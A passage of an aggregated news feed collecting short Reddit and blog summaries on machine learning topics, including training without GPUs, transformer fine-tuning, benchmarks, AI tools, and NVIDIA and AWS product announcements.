• Open

    [R] Cloud computing and other GPU alternatives
    I’m kind of new to the world of machine/deep learning so cut me some slack here, but I was wondering the best ways to train models (in my case a transformer) without a GPU. I personally don’t even have a PC, I’ve been using a 2017 MacBook Air. I know deep learning models are quite computationally expensive and since I don’t have access to a GPU, how do I train models? I’ve read about cloud computing services like AWS, Google Colab, etc. but I was wondering what the best method was. Ideally free or as cheap as possible. submitted by /u/Present_Network1959 [link] [comments]  ( 9 min )
    [D] Beta Test Invitation: Free AI Email Chrome Extension
    We are currently conducting a beta test for our Chrome Extension and we value external input. Our platform allows you to write and receive your gmail emails within the browser. You can also use AI to generate emails, without ever touching gmail or chatgpt. If you're interested in participating, please feel free to message or comment! submitted by /u/Live-Orange-8414 [link] [comments]  ( 9 min )
    Do Visual Transformers have anything equivalent to Pooling in CNN? [Discussion]
    I have a regression model based on CNN, works reasonably well with less than 1M parameters. I am trying to check how Visual Transformer (ViT) will perform on this task, but due to lack of pooling in ViT, model size is considerably large (~10M parameters). Do ViT have anything equivalent to pooling to reduce number of parameters? If not then that reduces applicability of ViT to large models on large dataset dataset only. For smaller tasks with small dataset, CNN or Resnet are way more computation efficient. Or am I missing something? submitted by /u/Apprehensive-War8915 [link] [comments]  ( 9 min )
    [D] How long does it take to setup an MLOps pipeline?
    For our R&D team, we spent over a month trying to setup our pipeline. After that, we spend at least 5 days after R&D for to put a model into production without the required data pipelines that communicate with our model and the service. For training a model, the infrastructure maintain and manage it also needs to be built for around 2 weeks. Currently, our best solution is to offload the training process by purchasing a GPU and keeping it in the office. submitted by /u/potanees [link] [comments]  ( 9 min )
    [R] Weights Reset implicit regularization
    ​ https://preview.redd.it/4t4jbi15rygb1.png?width=2291&format=png&auto=webp&s=f4eedf0d24dee2cbd040b3a19ab9610119b4001e Hi everyone! I want to share some interesting observations that indicate a very simple periodical weights resetting procedure could serve as an implicit regularization strategy for training DL models. This technique also shows potential connection with the Double Descent phenomenon. Here's the link to github etc: https://github.com/amcircle/weights-reset. As a co-author of this study, I must apologize in advance for its brevity. However, I sincerely hope it may prove useful to some. I would gladly respond to your queries and receive your criticism. Your personal experiences related to something similar would also be highly appreciated. submitted by /u/gregorivy [link] [comments]  ( 9 min )
    [D] Training process - Are text encodings used along with image encodings
    Hi, I am going through research papers and noticed that most of the papers talk about the text conditioned image generation process (reverse diffusion process). The text and time encodings are added as additional channels to the UNet block. However, I am curious to know if any text encodings are used during the training process as well. Is there any preview of the training datasets that is available which is used in the training process ? or a code snippet that points out to the forward part of the training loop Thanks submitted by /u/kaskoraja [link] [comments]  ( 9 min )
    [D] Benchmark for autoregressive LLM embedding quality for retrieval?
    Hi everyone, There has been a lot of work on benchmarking autoregressive LLMs, such as HF LLM Leaderboard, but I have not seen much work specifically on the relevancy of such LLMs for retrieval. There is a lot of talk about chat based on knowledge with solutions like llama_index, where LLMs both provide embeddings and answer based on most similar content, but embedding and answer generation need not be the same LLM. I saw the Massive Text Embedding Benchmark (MTEB) but it does not seem to contain a lot of information about the recent autoregressive LLMs. Are the recent autoregressive LLMs, e.g. Llama 2, actually performing better than Bidirectional LLMs such as BERT? Because if so, all the recent fancy chat with your documents projects could use much smaller models to do embedding extraction for retrieval and just call a fancy autoregressive LLM such as GPT4 for answer synthesis. submitted by /u/Separate-Still3770 [link] [comments]  ( 9 min )
    [D] [R] Opensource model that can caption an image of a chart?
    Hi I'm looking for an open source model that can take an image of an info graphic such as a pie chart, graph, etc, and provide a description of the information in that chart. For example the values of the x,y axis and their labels, weather the chart is increasing or decreasing. I've worked with image captioning models such as BLIP before as I have used them in projects involving stable diffusion, but this model doesn't give specifics about the information in the graph, just a brief overview. I know researches have worked on this problem in the past using the vistext dataset: https://news.mit.edu/2023/researchers-chart-captions-ai-vistext-0630 So far I'm thinking that it may come to me finetuning BLIP or equivalent to specialize on infographics instead. Thoughts? submitted by /u/UncleSammmm [link] [comments]  ( 9 min )
    [P] Any existing photo/video classifier UIs with custom labels?
    I have a significant amount of files that I would like to label for future reference. I've looked at software such as Photoprism or Librephoto which have object classification but they are based on a static model. I'd like something where I could label a few photos then generate similar matches where I can approve the good matches for reinforcement learning. I'm pretty sure I saw a demo like this at a code conference using Azure but I'm hoping for something self-hosted to avoid API fees. I was exploring coding something to do this for me but I don't want to put in the work if something with a UI exists already. This seemed like the best place to ask. submitted by /u/MZZXX [link] [comments]  ( 9 min )
    [D] Best way to run a pytorch model on a cropped version of a video on someone else's PC?
    Hi - I have trained a pytorch model that does some fairly simple object classification - The goal is distribute it as part of an app, that will pull information from a user's video. The videos are typically ~25-30 minutes and about 1GB in size, only a 600x600px square on the bottom right of the video is needed for the classification (it's a minimap in a video game) The app is electron based Ideally I want to input a video, and extract the labels from the cropped section once per second. ​ My current attempt involves converting the model to a tensorflowjs model, and rendering the video on a element, stretching it so only the minimap is visible on the canvas, running the model, saving the labels, and increasing the current time of the video by 1 second, and repeating until the video is done. ​ This seems like a terrible plan, but it's much better than the couple of other ideas I've tried (using ffmpeg to extract a frame every second for example) ​ Any advice appreciated! ​ Edit: just to clarify this will only ever be ran on Windows submitted by /u/FreddoRS [link] [comments]  ( 9 min )
    [R][P] Review to two/three words summarization | Text tagging
    Hello, I'm looking for a model (probably two models) that would: Summarize reviews (e.g. website review) to two/three words. Reuse these words or "review tokens" to tag reviews with similar content. Then if a review's content differs (e.g. cosine sim. of 0.2), another tag will be generated from the review that diverges. Is there anything like this on the "market"? submitted by /u/BartPetersyn [link] [comments]  ( 9 min )
    [D] Spectrum of Specialization in ML
    Hello to everyone reading this. I am just about to finish Andrew NG's course 3 courses on ML specialization and I have had 2 courses on ML as well in my Business Intelligence Analytics studies at uni. Now I am extremely interested in ML but I see there are wide diaspora of different subfields you can focus on. I need to get into the job market as fast as possible. So can anyone guide me which aspect of ML should I give most of my time to practice and build portfolio that would translate well to interviews and hiring? Thank you submitted by /u/JaguarMoosa [link] [comments]  ( 9 min )
    [D] Question Difficulty Predictor
    How would you proceed on a project in assessing the difficulty level of a question? I tried using lexicographic metrics like flesh-kincaid score, etc., but those did not yield proper results. Is there a good method I could use? Also, how could I assess the "readability" of a question, or in other words, how easy it is to understand what the question is asking. submitted by /u/uglyboi34 [link] [comments]  ( 9 min )
    [R]eleasing a new model for conditional music generation
    Hey y'all, this is a model I have been independently building for some time. It uses parts of OpenAI's Jukebox and HarmonAI's Dance Diffusion model. Overall it is a hierarchical latent diffusion modeland generates complete linked musical phrases at good quality. More information as well as examples can be found here: https://medium.com/@jeffsontagmusic/jukebox-diffusion-cbe22ff3cd47 Thanks! submitted by /u/jmoso13 [link] [comments]  ( 9 min )
    [D] How to stay on the cutting edge of applied ML/AI while doing my PhD?
    A lot of my PhD work will be in using different types of ML/NN approaches to characterizing problems in my field. It's kind of weird, since for my undergrad I came from a more traditional science background where we research off papers that were written like 2-20 years ago. Since a lot of these architectures and whatever are updating so fast, I wanted to see if there's a good way to keep up with the latest information so my work wouldn't be outdated by the time I publish. Is there a general workflow that those of you in the field follow in regards to this? submitted by /u/This-Is-My-20th-Acc [link] [comments]  ( 9 min )
    A blog on LoRA and QLoRA finetuning techniques [P]
    Hey everyone, I wrote a blog on LoRA and QLoRA. Hope it helps you in understanding the theory behind them 🤗 https://medium.com/@gitlostmurali/understanding-lora-and-qlora-the-powerhouses-of-efficient-finetuning-in-large-language-models-7ac1adf6c0cf If the above one is behind paywall, you can visit the blog here (https://gitlostmurali.com/machine-learning/data-science/lora-qlora) submitted by /u/Outlandish_MurMan [link] [comments]  ( 8 min )
    [D] I’m losing my voice due to illness, and I’m looking for ML/AI solution
    Hey all, like the title says, I’m losing my voice due to an illness (Parkinson’s disease), and I would like to create an AI voice using recordings from 10 years ago. I used to be a prolific podcaster, and I have about 50 episodes of podcasts that I can use as input. Is this possible? What service or software can I use? My voice is beyond repair since Parkinson’s is a progressive disease. An AI voice would allow me to work and would open up new doors for me. Thank you! submitted by /u/NWMoney101 [link] [comments]  ( 9 min )
    [P] Candle: Torch Replacement in Rust
    Candle is a minimalist ML framework for Rust Some of its features Examples of popular models: Whisper, Llama 2, Falcon, Bert, Starcoder WASM support, so you can run the models directly in the browser User-defined kernels, so you can use Flash Attention Similar syntax to PyTorch Data loaders Transformer utilities submitted by /u/hackerllama [link] [comments]  ( 9 min )
    [D] How to keep my ML skills whilst on another job?
    Hey all, I have a technical background, having studied engineering and ML at one of the world's leading universities. I really enjoyed it and did well, but long story short, since graduating (coming to 2 years) I have been working in a Family Office, doing things I don't feel are very related. I wanted to know what kind of things I can do to keep myself in the loop and continue developing my ML/DS skills in my spare time. Alternatively, ideas of projects I could have just to make sure I have a portfolio? submitted by /u/thegreatudini [link] [comments]  ( 9 min )
    [P]MMLU-by-Task Evaluation Results for 500+ Open Source Models
    Typically, research papers and leaderboards only report the overall score on Measuring Massive Multitask Language Understanding (MMLU) and not per task performance. Hugging Face recently released detailed evaluation data that includes per task performance. I made a sortable leaderboard here https://huggingface.co/spaces/CoreyMorris/MMLU-by-task-Leaderboard . You can also make custom scatter plots on the site so you can explore the relationship between parameter count and performance. submitted by /u/corey1505 [link] [comments]  ( 9 min )
    [D] Current trends in explainability?
    I've realized my technical understanding of explainability is a few years behind, having last focused on it with LIME and Shap. Does anyone have a survey reference they like for recent trends and updates in ML explainability? submitted by /u/balcell [link] [comments]  ( 8 min )
    [R] What's the current research status of "SFT with high-quality data" vs RLHF?
    At first, with InstructGPT and ChatGPT, it looked like RLHF was the holy grail to successfully finetune LLMs on human preferences. Then, from May 2023 onwards, a trend of doing just SFT with high-quality data showed up (e.g. "LIMA: Less Is More for Alignment" https://arxiv.org/abs/2305.11206) as an alternative to doing RLHF. What's your opinion on these two narratives? Is RLHF likely to still be relevant even in the presence of SFT with high-quality data? submitted by /u/bornot2b [link] [comments]  ( 9 min )
    [Discussion] What has your experience been as someone joining ML from a lateral field?
    Hi all, I am currently already working in the field of ML research at a big name medical research center. Our main focus is in application of ML methods with the focus on stroke diagnostics and treatment. Now, I am quite happy working here but my background is somewhat interdisciplinary. I have a bachelor's in Life science and a Master in bioinformatics. Because of this I always feel like I have to catch up to my colleagues when it comes to ML and in parts also computer science knowledge. It feels like there are a million things to learn and many small details to know that I am not even sure how to look up. I am curious what your experience has been if you were/are in a similar situation? How did you manage to catch up? submitted by /u/JuicyLambda [link] [comments]  ( 9 min )
    [D] Does SOTA performance on object detection seem low to anybody else?
    Either I'm too new to the space, or I'm stating the obvious, but it seems that object detection performance is really low. The SOTA currently is 66% on COCO test-dev, which doesn't match how well it seems like AI is currently performing with self-driving cars, surveillance tech, and others. Am I missing something? submitted by /u/philipkd [link] [comments]  ( 9 min )
    [R] Hierarchical Representation and Propagation of Wavefunctions within Gaussian Basis Functions
    I. Introduction This paper aims to provide an in-depth explanation of representing and propagating wavefunctions in a hierarchical manner using Gaussian basis functions. Wavefunctions are mathematical descriptions of the quantum states of physical systems and are fundamental to quantum mechanics. However, representing complex wavefunctions for real-world quantum systems remains a key challenge. This paper proposes using multiple layers of Gaussian basis functions, with trainable amplitudes, to represent wavefunctions in a hierarchical fashion and enable wavefunction propagation between layers. Understanding wavefunction representation and propagation has significant implications in diverse fields like quantum computing, quantum chemistry, and materials science. Efficient wavefunction man…  ( 12 min )
    Evol-Instruct Dataset Creation [R] [D]
    I’ve been researching the Evol-Instruct datasets now for a few days and have decided I want to build my own out for a specific use case. I’ve read literally everything possible, admittedly not much outside of WizardLM and GeorgiaTech, but I’ve read it. I was hoping to discuss it here with smarter people. I’m seeing this as a way to use LLMs to generate great datasets. However, my use case doesn’t really exist in any models yet. Not thoroughly enough to produce a good Evol-Instruct set. So, I’m going to do that tomorrow. I’m going to use The Blokes WizardCoder-Guanaco 15b GPTQ version to train on my specific dataset - about 10GB of clean, really strong data I’ve spent 3-4 weeks putting together. In theory, I’ll use the Evol-Instruct script from WizardLM to generate the new dataset, and then I’ll apply that to whatever model I decide to use. There is a good chance I train my own on general Evol-Instruct datasets available now, and likely quite a large one. I’m looking for any tips, discussion, ideas, thoughts from the community. Cheers! submitted by /u/LoadingALIAS [link] [comments]  ( 9 min )
  • Open

    I made this film completely using AI! From Chat GPT to EbSynth!
    submitted by /u/RMIII3 [link] [comments]  ( 8 min )
    This video argues that artificial intelligence should not be regulated.
    submitted by /u/antaloaalonso [link] [comments]  ( 8 min )
    Catching up on the weird world of LLMs
    submitted by /u/nangaparbat [link] [comments]  ( 8 min )
    AI Service to unblur a slightly blurry Passport?
    All services I found made the blurry text even worse. Is there any which has good results for documents? submitted by /u/_SarahB_ [link] [comments]  ( 8 min )
    A whole sitcom I Made using AI Art & Voice. Entertainment is on its way back to the hands of the Independent creator
    submitted by /u/SoundRedux [link] [comments]  ( 8 min )
    I've developed a tool to convert voice notes into structured text: seeking your valuable feedback and suggestions!
    Hi there 👋, I'm excited to share a project I've been working on over the past few months! My primary goal is to create a service that will be beneficial for people. Please share your thoughts on this idea, and suggest any new features you think I should implement! Exciting Features: • Speak to Write: with this feature, you can speak your thoughts or information and the tool will transcribe it into text. The best part? You can then forward the transcribed text to any application with just one click. • Audio to Action Plan: the service can transform a received audio message into a structured list of elements or bullet points. This feature is especially useful for outlining an action plan or item list. • Speak in and Language: you can dictate an audio message in your native language, and the service will translate it into any other language, maintaining high translation quality—significantly better than Google Translate. • Meeting Transcripts & Summaries: the service is perfect for converting recorded audio from meetings into text and generating concise summaries. It supports the upload of users' files. Thank you for taking the time to check it out. I look forward to hearing your feedback. You can access the service by visiting this link: https://audionotes.ai submitted by /u/OneMoreSuperUser [link] [comments]  ( 9 min )
    Are there are any *good* image gen AI APIs?
    I have a killer project idea but it requires fully custom image generation. Character portraits. Any API like that out there? submitted by /u/thedarklord176 [link] [comments]  ( 8 min )
    Is there AI that browses a website, checks the structure of the content of the page and then writes a script for me that extracts the data regularly?
    I just want a script to perform the task not AI itself so that I have something reliable. It always puzzles me why these things don't instantly pop up as services where I don't have to worry about even deploying the script (but that's another issue). submitted by /u/VLADIMIROVIC_L [link] [comments]  ( 8 min )
    Nvidia, Hugging Face collaboration on DGX...noice!
    submitted by /u/Internet0fGames [link] [comments]  ( 8 min )
    GPT4 Chose Female Character for Youtube, Named AI Ada, as reference to Ada Lovelace, first women programmer in order to pay homage to the vital role women have played, and continue to play, in the field of technology and AI. Quite Awesome!
    submitted by /u/stefanbg92 [link] [comments]  ( 8 min )
    ChatGPT for Beginners: How to Create Images
    Tutorial about creating images using ChatGPT. submitted by /u/SplitYOLO [link] [comments]  ( 8 min )
    Video editing ai
    Hello, I'm currently editing videos using capcut, which is not ideal. I'm looking for an ai, that ideally : Finds me B-roll according to what I speak. Cuts "bad takes" out Good captions "TikTok style" Audio enhance. Do you guys know anything like this? Thank you! submitted by /u/Orlandostyler [link] [comments]  ( 8 min )
    Spotify AI
    I've been using this today whilst I've been working and I found it pretty comical at first with the voice that talks to you, but now I'm starting to love it! I want it to talk more when it does talk. It feels like a nice break in the music to have the AI talk like a radio host. I'm sure some people would rather that not being a feature (if they use it at all), but I'd love for it to have some more comedic one-liners, possible news updates, and potentially traffic updates based on location and if it knows you're driving. Would be awesome! It's also a really good tool for if you want to listen to music you've not heard before. Whether it's part of your usual genre or not. Looking forward to seeing how this progresses! submitted by /u/Columbian_Toad [link] [comments]  ( 9 min )
    Generative AI: An Artist's Honest Perspective
    Hi everyone. I am an artist. And programmer, and kind of a bit of everything. But what is important, is that I was an artist before the current "generative AI" was a thing, and I have been drawing, digitally and traditionally alike for like... a decade? Art, to me, is getting what is inside your head, and presenting it to others outside of your consciousness and thoughts. It's showing the world a piece of your interpretation, your experience, your impressions of the world you inhabit. It's about communicating to others your emotions, your ideas, your thoughts and feelings. Not everyone can draw, or paint, or sculpt. I could say "learn it, it's easy", but that would be a lie. It isn't easy. It is years upon years of constant, hard work, requiring focus and dedication, and a passion for l…  ( 11 min )
    Allen Institute for AI takes new approach to managing AI risks and promoting transparency
    submitted by /u/DarronFeldstein [link] [comments]  ( 8 min )
    How do I make AI-generated videos with prompts?
    How do I make AI-generated videos with prompts for free? submitted by /u/DankDude6T9 [link] [comments]  ( 8 min )
    I'm making my first AI game.
    Hello AI enthusiasts! I'm a software engineer passionate about AI, and recently I've been experimenting with making my first AI game. In the game, you try to negotiate a price down on a watch with an AI-driven salesman, rewarding -or roasting lol- you depending on your bargaining skills. I’d be more than happy to get your thoughts and feedback on this idea, it's the first application I've built using AI so any tips would be much appreciated! Thanks! submitted by /u/gavo_gavo [link] [comments]  ( 9 min )
    Sod Off, Human! AI's Magic Revealed!
    submitted by /u/ispeakout [link] [comments]  ( 8 min )
    A body-positive nonprofit replaced staff with an AI chatbot – the move backfired
    submitted by /u/intengineering [link] [comments]  ( 8 min )
    Is there an AI for reviewing videos based on audience category?
    I want to start making a YouTube channel, because I've got a passion project I want to work on with a Minecraft modpack. Obviously, Minecraft is a HUGE game and has thousands of videos posted every day... This is why I want to know if there is an AI that can rate videos based on editing, audience engagement, sound, etc... Also giving areas of improvement and the strengths of the video. Probably a big ask and SO far fetched, but there's always a chance of something being out there. submitted by /u/Columbian_Toad [link] [comments]  ( 9 min )
    AI photo editor recommendationd
    Can someone recommend a great AI photo editor that can take 100 profile photos and standardise them, IE crop so head is same size across all photos, background removed and placed on standard back ground. submitted by /u/Woodger [link] [comments]  ( 8 min )
    Sorry Jarvis
    ​ https://preview.redd.it/9epla7xjdugb1.png?width=960&format=png&auto=webp&s=92190970027b08476ac9899a42d7099fe67cf5aa submitted by /u/Maxie445 [link] [comments]  ( 8 min )
    One-Minute Daily AI News 8/7/2023
    Data analytics company Qureight has entered into a multi-year strategic research collaboration with AstraZeneca that will use AI models to accelerate research into lung diseases.[1] Zoom’s terms of service update establishes the video platform’s right to use some customer data for training its AI models.[2] Cigna, one of the country’s largest health insurance companies, faces a class action lawsuit over charges that it illegally used an AI algorithm to deny hundreds of thousands of claims without a physician’s review.[3] Japan plans guidelines for AI-savvy human resources.[4] Sources: [1] https://www.digitalhealth.net/2023/08/qureight-collaborates-with-astrazeneca-for-ai-lung-disease-research/ [2] https://www.cnbc.com/2023/08/07/zoom-ai-tools-trained-using-some-customer-data.html [3] https://www.medicaleconomics.com/view/cigna-using-ai-to-reject-claims-lawsuit-charges [4] https://asianews.network/japan-plans-guidelines-for-ai-savvy-human-resources/ submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Ai generated trailer for horror film “Magic 8”
    submitted by /u/SellowYubmarine [link] [comments]  ( 8 min )
  • Open

    AdaTape: Foundation model with adaptive computation and dynamic read-and-write
    Posted by Fuzhao Xue, Research Intern, and Mostafa Dehghani, Research Scientist, Google Adaptive computation refers to the ability of a machine learning system to adjust its behavior in response to changes in the environment. While conventional neural networks have a fixed function and computation capacity, i.e., they spend the same number of FLOPs for processing different inputs, a model with adaptive and dynamic computation modulates the computational budget it dedicates to processing each input, depending on the complexity of the input. Adaptive computation in neural networks is appealing for two key reasons. First, the mechanism that introduces adaptivity provides an inductive bias that can play a key role in solving some challenging tasks. For instance, enabling different num…  ( 93 min )
  • Open

    Growing Bonsai Networks with RNNs
    submitted by /u/Ameobea [link] [comments]  ( 8 min )
    I made an animated video explaining Effective Accelerationism (aka e/acc), a philosophical movement related to AI that has recently grown a lot in popularity and offers a path to a post-scarcity technological utopia. It has even been endorsed by Marc Andreessen and Garry Tan.
    submitted by /u/antaloaalonso [link] [comments]  ( 8 min )
    Getting the Hang of OpenCV’s Inner Workings with ChatGPT
    ​ https://preview.redd.it/xdp3bkwwpvgb1.jpg?width=2800&format=pjpg&auto=webp&s=513a63ed81eec85e6bc254f84e4208094afc7d4a Very interesting blog post from OpenCV.ai team about how can explore ChatGPT to serve for code development debugging. Introduction from the article: As programmers, we often work with familiar development environments, but occasionally we encounter new tools that can be time-consuming and challenging to learn. In such situations, having virtual assistance can be extremely beneficial. In this article, I will share my experience of contributing to OpenCV, a renowned open-source library, despite having limited knowledge of C++ and understanding its architecture. I achieved this with the assistance of ChatGPT, a Large Language Model (LLM). I hope you can find it interesting. More details are here. submitted by /u/No-Independence5880 [link] [comments]  ( 9 min )
    Mixture of Experts (MoE)
    submitted by /u/ABDULKADER90H [link] [comments]  ( 8 min )
  • Open

    Studying RL is hard
    I want to study Reinforcement Learning, but the concepts are really hard and mathematical. Whenever I think I grasp something I forget it the next day completly. The Basic Concepts of MDP is the only thing which I think I understood. But I cant understand the Training algorithms like Sarsa or Q-Learning and DQN and their implementations. I am really frustrated and overwhelmed. Does anyone know some good resources to understand the concepts and implementations of RL? submitted by /u/Menium [link] [comments]  ( 9 min )
    Is it necessary to run "episodes" in model-free learning?
    In Q-learning (image), episodes are run, in the sense that, the states are visited in the order they appear as part of one sequence in an episode. In Dyna-Q (image) (which is btw described to be the same as Q-learning when the planning portion is deleted), there doesn't seem to be any iteration over the states of an episode. It just picks a state, applies the e-greedy policy on it to choose the action, learns, updates the model, then plans. Would Q-learning also work fine if we got rid of the "episodes" and just picked isolated state-action pairs? Thank you submitted by /u/AstronautVarious3791 [link] [comments]  ( 9 min )
    Intuition about what features deep RL learns?
    I know for image recognition there is a rough intuition that neural network lower layers learn low level features like edges, and the higher layers learn more complex compositions of the lower layer features. Is there a similar intuition about what a value network or policy network learns in deep RL? If there are any papers that investigate this that would be helpful submitted by /u/Turkeydunk [link] [comments]  ( 9 min )
  • Open

    Productive constraints
    This post will discuss two scripting languages, but that’s not what the post is really about. It’s really about expressiveness and (or versus) productivity. *** I was excited to discover the awk programming language sometime in college because I had not used a scripting language before. Compared to C, awk was high-level luxury. Then a […] Productive constraints first appeared on John D. Cook.  ( 6 min )
    Möbius transformations over a finite field
    A Möbius transformation is a function of the form where ad – bc = 1. We usually think of z as a complex number, but it doesn’t have to be. We could define Möbius transformations in any context where we can multiply, add, and divide, i.e. over any field. In particular, we could work over […] Möbius transformations over a finite field first appeared on John D. Cook.  ( 6 min )
  • Open

    DSC Weekly 8 August 2023
    Announcements Top Stories In-Depth The post DSC Weekly 8 August 2023 appeared first on Data Science Central.  ( 20 min )
    The emergence of prompt engineers: The next in-demand role in AI
    Prompt engineers are emerging as key players in the development and optimization of AI models as artificial intelligence (AI) continues its evolution and becomes an integral part of various industries. As experts at crafting effective prompts, they have been instrumental in shaping the future of artificial intelligence through their ability to enable models to deliver… Read More »The emergence of prompt engineers: The next in-demand role in AI The post The emergence of prompt engineers: The next in-demand role in AI appeared first on Data Science Central.  ( 22 min )
  • Open

    SIGGRAPH Special Address: NVIDIA CEO Brings Generative AI to LA Show
    As generative AI continues to sweep an increasingly digital, hyperconnected world, NVIDIA founder and CEO Jensen Huang made a thunderous return to SIGGRAPH, the world’s premier computer graphics conference. “The generative AI era is upon us, the iPhone moment if you will,” Huang told an audience of thousands Tuesday during an in-person special address in Read article >  ( 9 min )
    Startup Pens Generative AI Success Story With NVIDIA NeMo
    Machine learning helped Waseem Alshikh plow through textbooks in college. Now he’s putting generative AI to work, creating content for hundreds of companies. Born and raised in Syria, Alshikh spoke no English, but he was fluent in software, a talent that served him well when he arrived at college in Lebanon. “The first day they Read article >  ( 6 min )
    NVIDIA Makes Extended-Reality Streaming More Scalable, Customizable for Enterprises and Developers
    Organizations across industries are using extended reality (XR) to redesign workflows and boost productivity, whether for immersive training or collaborative design reviews. With the growing use of all-in-one (AIO) headsets, more teams have adopted and integrated XR. While easing XR use, AIO headsets have modest compute and rendering power that can limit the graphics quality Read article >  ( 6 min )
    Extended Cut: NVIDIA Expands Maxine for Video Editing, Showcases 3D Virtual Conferencing Research
    Professionals, teams, creators and others can tap into the power of AI to create high-quality audio and video effects — even using standard microphones and webcams — with the help of NVIDIA Maxine. The suite of GPU-accelerated software development kits and cloud-native microservices lets users deploy AI features that enhance audio, video and augmented-reality effects Read article >  ( 8 min )
    Content Creation ‘In the NVIDIA Studio’ Gets Boost From New Professional GPUs, AI Tools, Omniverse and OpenUSD Collaboration Features
    AI and accelerated computing were in the spotlight at SIGGRAPH — the world’s largest gathering of computer graphics experts — as NVIDIA founder and CEO Jensen Huang announced during his keynote address updates to NVIDIA Omniverse, a platform for building and connecting 3D tools and applications, as well as acceleration for Universal Scene Description (known as OpenUSD), the open and extensible ecosystem for 3D worlds.  ( 10 min )
    Shutterstock Brings Generative AI to 3D Scene Backgrounds With NVIDIA Picasso
    Picture this: Creators can quickly create and customize 3D scene backgrounds with the help of generative AI, thanks to cutting-edge tools from Shutterstock. The visual-content provider is building services using NVIDIA Picasso — a cloud-based foundry for developing generative AI models for visual design. The work incorporates Picasso’s latest feature — announced today during NVIDIA Read article >  ( 6 min )
    A Textured Approach: NVIDIA Research Shows How Gen AI Helps Create and Edit Photorealistic Materials
    NVIDIA researchers are taking the stage at SIGGRAPH, the world’s largest computer graphics conference, to demonstrate a generative AI workflow that helps artists rapidly create and iterate on materials for 3D scenes. The research demo, which will be presented today at the show’s Real-Time Live event, showcases how artists can use text or image prompts Read article >  ( 6 min )
    DENZA Collaborates With WPP to Build and Deploy Advanced Car Configurators on NVIDIA Omniverse Cloud
    DENZA, the luxury EV brand joint venture between BYD and Mercedes-Benz, has collaborated with marketing and communications giant WPP and NVIDIA Omniverse Cloud to build and deploy its next generation of car configurators, NVIDIA founder and CEO Jensen Huang announced at SIGGRAPH. WPP is using Omniverse Cloud — a platform for developing, deploying and managing Read article >  ( 5 min )
  • Open

    Host the Spark UI on Amazon SageMaker Studio
    Amazon SageMaker offers several ways to run distributed data processing jobs with Apache Spark, a popular distributed computing framework for big data processing. You can run Spark applications interactively from Amazon SageMaker Studio by connecting SageMaker Studio notebooks and AWS Glue Interactive Sessions to run Spark jobs with a serverless cluster. With interactive sessions, you […]  ( 7 min )
    Deploy thousands of model ensembles with Amazon SageMaker multi-model endpoints on GPU to minimize your hosting costs
    Artificial intelligence (AI) adoption is accelerating across industries and use cases. Recent scientific breakthroughs in deep learning (DL), large language models (LLMs), and generative AI is allowing customers to use advanced state-of-the-art solutions with almost human-like performance. These complex models often require hardware acceleration because it enables not only faster training but also faster inference […]  ( 13 min )

  • Open

    Please criticize our llm writing integration app [P]
    Here's the pitch: We made an editor called Gamut that lets you enter your ideas in any form you want. Bullets, carefully constructed paragraphs, it doesn’t matter. Then, our patent-pending technology lets you convert to prose and adjust, shaping the text like a graphic designer shapes an image. We want r/MachineLearning's advice and field experience, because tbh we're just a bunch of teenagers who haven't even gone to college yet. Check it out: gamut.ink submitted by /u/gamut_ink [link] [comments]  ( 9 min )
    [D]Could current AI tech make a movie of Alejandro Jodorowsky's vision of 'Dune'?
    I was just watching the documentary about the 'greatest movie never made', director Alejandro Jodorowsky's vision of Frank Herbert's Dune. There is a huge book that contains a storyboard version of the movie with lots of production art by artists Moebius, Chris Foss and HR Giger. The movie was to star Jodorowsky's son as Paul Atriedes, Salvadore Dali as the Emperor, Orson Wells as Baron Harkonnen and Mick Jagger as Feyd. Could one of today's AIs be 'fed' Jodorowsky's book and create a movie of his vision? Curious to know what your opinions are on this. Thanks. submitted by /u/shopdog [link] [comments]  ( 9 min )
    [P] Regression using batch trend data
    Hi, all, I would like to use batch reaction trend data to build a regression model. I'm wondering what is the best way to approach this. Here's some background: Reaction Data: Time (min) Pressure (bar) Temperature (°C) Flow (kg/h) Gas Total (kg) 1 10 70 502 8 2 10.1 71 498 16 ... ... ... ... ... 102 10.3 76 475 850 Output: Polymer property X The reaction continues until a gas total is met and the time this takes depends on the other variables. I have ~700 batches of data in a format similar to the above and would like to predict polymer property X. As the variables can change minute to minute I was thinking of binning the variables into 5 minute bins using the mean and using these as variables for linear regression or similar. Is this a valid approach or is there another way I can approach the problem? Thanks! submitted by /u/Nefarious_P_I_G [link] [comments]  ( 9 min )
    [R] Awesome OOD Detection, Robustness, and Generalization
    Hi everyone, I have put together a repo that provides comprehensive resources for Out-of-distribution Detection, Robustness, and Generalization. The repo contains articles, talks, libraries, papers, etc. Check it out. https://github.com/continuousml/Awesome-Out-Of-Distribution-Detection submitted by /u/Ok-Kaleidoscope-505 [link] [comments]  ( 8 min )
    [D] Uncertainty Prediction in Deep Learning - CAPSA github project alternative or old code?
    Alexander Amini, a Postdoctoral Associate at MIT, well known for the MIT's Introduction to Deep Learning Course, published a git repo called CAPSA for uncertainty prediction. This was introduced during the online course. The code was released under Thermis AI, Inc, a private company. He is the co-founder and CSO of the company. You can check how well the code was documented in the wayback machine. Recently, they removed the code base from the github and launched a pro version with selected companies as beta. The original repo (now called capsa-lite) was a great learning tool that I wanted to use. This was a quick way to try out different methods of uncertainty prediction using minimal code. Unfortunately, they have pulled all previous version of the code from the github repo. I was wondering if anyone knows a similar python package or has the old repo - would be really helpful! submitted by /u/shikamaru_77 [link] [comments]  ( 9 min )
    [D] ML Workstation for CNN and Transformers - Feedback on Component Selection
    I'm putting together an ML workstation primarily focused at handling CNN and Transformer workloads. Component selection so far: https://de.pcpartpicker.com/list/zVPtt7 I've got a couple of questions specifically regarding the motherboard. One concern I have is whether the space between the two GPUs is sufficient, as I'm planning to set them up using NVLink. Additionally, I'm curious about the compatibility of the case and motherboard for effective air cooling ( not considering water cooling at the moment). Anyone else with dual 3090s who can give some insights on how they've managed temperatures and potential overheating issues? Lastly, would upgrading to a Ryzen 9 5900X prevent me from bottlenecking the GPU's? Would love to hear your feedback and suggestions! submitted by /u/Hugejiji [link] [comments]  ( 9 min )
    Finetuning for code generation [D]
    i want to fine tune any open source llm for code generation purpose with some of my code. any idea what model would be suitable? and any example of implementation? submitted by /u/learner_beginner [link] [comments]  ( 8 min )
    [D] How difficult is it to find a job in ML/AI without a PhD, in the current bad job market?
    Anyone here know what the trends are towards hiring for an AI/ML position without a PhD? Is it advisable to get a PhD if you want to be in the field and keep rising within it? submitted by /u/CleanGarden7051 [link] [comments]  ( 8 min )
    [D] Machine learning or quantum computing?
